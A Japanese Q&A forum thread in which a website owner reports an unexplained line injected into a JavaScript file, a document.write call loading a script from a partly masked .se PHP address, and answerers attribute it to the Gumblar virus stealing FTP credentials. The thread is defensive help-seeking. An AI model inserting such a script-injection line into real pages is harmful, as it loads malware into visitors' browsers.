• ベストアンサー

レンタルサーバーで、ホームページを運営しております。本日突然表示がおか

レンタルサーバーで、ホームページを運営しております。本日突然表示がおかしくなり、Webサーバー内のファイルを調べたところ、jsファイルに追加した覚えのない記述が見つかりました。以下のような変なサイトのphpファイルのURLも記述されています。 document.write('<script src=http://**.se/bilder/klassfest3.php ><\/script>'); このような記述はしていませんし、サーバーにアップロード前のjsファイルと比べてもこのような記述はありません。 何者かがファイルを書き換えることなんて出来るのでしょうか? 防衛策なんてあるのでしょうか? あまり知識の無いものがHPの運営をしているのが問題かもしれませんが、今後のことを思うと心配です。

質問者が選んだベストアンサー

  • ベストアンサー
  • qwerjpo
  • ベストアンサー率44% (39/88)
回答No.2

詳しい者ではありませんが、 レンタルサーバー側がクラックされたか、もしくはあなたのPC(もしくはネットワーク内のどれかのPC)が Gumblar(別名GENOウイルス)に感染している可能性があると思われます。 Gumblarウイルスに感染した場合、アップロードするためのFTPのIDとパスワードが攻撃者に盗まれるので悪用される事があります。 実際、そのサイトに行くとGumblarウイルス(Trojan-Downloader.JS.Gumblar.x)がダウンロードされる仕組みになっています。 もちろんウイルスに感染していると断言することはできませんが、 念のためウイルスをスキャンすることをオススメします。

y-ring
質問者

お礼

ご回答ありがとうございます。 確かに1台のパソコンの調子が悪いです。 ウィルススキャンを実施します。 レンタルサーバー業者にもその旨を伝えます。 ありがとうございました。

すると、全ての回答が全文表示されます。

その他の回答 (1)

  • Toshi0230
  • ベストアンサー率51% (836/1635)
回答No.1

侵入経路はわかりませんがクラックされてますね。 今後の対応策としては、「セキュリティホール」と呼ばれる「裏口(侵入口)」をふさいでいくしかないのですが、まぁ一言じゃ説明できませんのでレンタルサーバ業者に相談することをおすすめします

y-ring
質問者

お礼

早速のご回答ありがとうございます。 まずはレンタルサーバー業者に当たってみます。

y-ring
質問者

補足

セキュリティホールは、レンタルサーバー側ということでしょうか?それとも私のサイトのフォルダの中ということなのでしょうか?

すると、全ての回答が全文表示されます。

関連するQ&A